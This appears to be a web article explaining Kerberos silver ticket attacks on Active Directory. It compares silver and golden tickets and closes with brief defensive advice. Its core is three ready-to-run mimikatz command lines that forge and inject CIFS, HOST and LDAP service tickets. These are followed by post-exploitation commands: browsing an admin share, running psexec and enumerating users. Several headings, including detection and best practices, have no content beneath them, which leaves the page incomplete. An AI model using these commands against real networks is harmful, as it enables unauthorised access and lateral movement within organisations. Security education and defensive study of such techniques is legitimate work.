Silver Ticket Attacks: Service Ticket Manipulation
Complete technical guide to silver ticket attacks including forged service tickets, comparison with golden tickets, creation techniques, and defensive strategies for Active Directory.
The Silent Service Compromise
A silver ticket is a forged Kerberos service ticket (TGS) that grants access to a specific service without interacting with the domain's KDC. Unlike golden tickets which forge TGTs using the KRBTGT hash, silver tickets forge service tickets using only the target service account's NTLM hash. Silver tickets are more limited in scope but significantly more stealthy — they exploit the service ticket architecture without generating KDC events.
Silver Ticket vs Golden Ticket
Golden Ticket: Forges TGT, requires KRBTGT hash, grants full domain access, generates KDC events.
Silver Ticket: Forges TGS, requires service account hash, grants single-service access, generates no KDC events.
Common Service Targets
Creating Silver Tickets
# CIFS silver ticket for file share access
mimikatz.exe "kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXXXXXXXX /target:FileServer.corp.local /service:CIFS /rc4:SERVICE_NTLM_HASH /user:Administrator /id:500 /ptt" "exit"
# HOST silver ticket for remote management
mimikatz.exe "kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXXXXXXXX /target:Server01.corp.local /service:HOST /rc4:SERVICE_NTLM_HASH /user:Administrator /ptt" "exit"
# LDAP silver ticket for AD enumeration
mimikatz.exe "kerberos::golden /domain:corp.local /sid:S-1-5-21-XXXXXXXXXX /target:DC01.corp.local /service:LDAP /rc4:DC_COMPUTER_HASH /user:Administrator /ptt" "exit"
Note: Mimikatz uses kerberos::golden for both — the difference is the inclusion of /target and /service parameters.
Using Silver Tickets
# After injecting CIFS silver ticket
dir \\FileServer\c$
# After injecting HOST and CIFS tickets
psexec \\TargetServer cmd.exe
# After injecting LDAP ticket
powershell.exe -c "Get-ADUser -Filter *"
Detection Challenges
Silver tickets generate no KDC traffic since the forged TGS is presented directly to the service. Detection requires service-side event logs:
Common Mistakes
Best Practices
Related Tools
Related Articles
Summary
Silver tickets are forged service tickets providing access to specific services without KDC interaction. While more limited than golden tickets, they offer superior stealth. Defending requires protecting service account hashes, AES-only encryption, managed service accounts, and monitoring service-side access logs.